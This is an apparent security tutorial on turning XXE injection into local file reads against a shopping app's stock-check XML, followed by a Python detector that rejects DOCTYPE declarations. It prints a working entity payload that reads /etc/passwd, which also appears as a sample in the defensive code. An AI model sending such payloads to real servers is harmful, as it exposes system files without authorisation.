XXE to LFI
Last updated
In order to retrieve data from the server's backend, we'll have to modify the submitted XML in two ways:
1. Add a DOCTYPE element that defines an external entity containing the sensitive file path.
2. Edit the data value in the XML that is returned in the application's response, so that it makes use of the defined external entity.
Suppose a shopping application checks the stock level of a product by submitting the following XML to the server:
We can just add a DOCTYPE element to fetch the sensitive file as an external entity.
The payload above declares &xxe; as an external entity whose value is the contents of the /etc/passwd file, and then uses that entity within the productID value. The backend therefore treats the contents of /etc/passwd as the productID and reflects it in the response.
Payload used:
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
We'll have to place it right after the <?xml ... ?> declaration, and reference it in the productID value using an & at the start and a ; at the end => &xxe;
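From the defending side, the same payload structure is what a server should refuse before the document ever reaches the application parser. The following Python is an added example, not code from the original page: it scans a request body with the standard-library expat parser, records any DOCTYPE and entity declarations (in particular external ones with a SYSTEM identifier), and only then reads the product id. The stock-check element names (stockCheck, productId, storeId) and the sample request bodies are constructed for the example; the DOCTYPE line is the one shown above.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed sample requests for the stock-check endpoint described above.
BENIGN_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId><storeId>29</storeId></stockCheck>"""

XXE_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE d0p [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>29</storeId></stockCheck>"""


def inspect_xml(document: str) -> dict:
    """Scan a document with expat and report any DOCTYPE / entity declarations.

    Nothing is resolved here: no ExternalEntityRefHandler is installed, so a
    SYSTEM entity is recorded but its target is never opened.
    """
    report = {"doctype": None, "entities": [], "parse_error": False}

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        report["doctype"] = doctype_name

    def on_entity(entity_name, is_parameter_entity, value, base,
                  system_id, public_id, notation_name):
        report["entities"].append({
            "name": entity_name,
            "external": system_id is not None,   # SYSTEM "file:///..." style
            "system_id": system_id,
        })

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(document, True)
    except xml.parsers.expat.ExpatError:
        # Malformed input: whatever was declared before the error is still
        # reported, and the caller rejects the document in any case.
        report["parse_error"] = True
    return report


def parse_stock_check(document: str) -> str:
    """Hardened handling of a stock-check request: refuse any DTD, then read productId."""
    report = inspect_xml(document)
    if report["doctype"] is not None or report["entities"]:
        names = [e["name"] for e in report["entities"]]
        raise ValueError(f"rejected: DOCTYPE={report['doctype']!r}, entities={names}")
    if report["parse_error"]:
        raise ValueError("rejected: malformed XML")
    root = ET.fromstring(document)
    product_id = root.findtext("productId")
    if product_id is None:
        raise ValueError("rejected: missing productId")
    return product_id


if __name__ == "__main__":
    print("benign ->", parse_stock_check(BENIGN_REQUEST))
    print("xxe    ->", inspect_xml(XXE_REQUEST))
    try:
        parse_stock_check(XXE_REQUEST)
    except ValueError as err:
        print("xxe    ->", err)
```

The check rejects on the presence of a DOCTYPE at all rather than trying to distinguish harmless internal entities from external ones; a stock-check endpoint has no legitimate need for a DTD, and the rejected declaration names give an incident responder a useful log line.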
Suppose a website is built on a PHP backend and we find hidden endpoints such as /db.php that we cannot access via the browser; in that case, inspect the requests and responses through Burp.
Using this base64 encoding, we get the expected output in the response.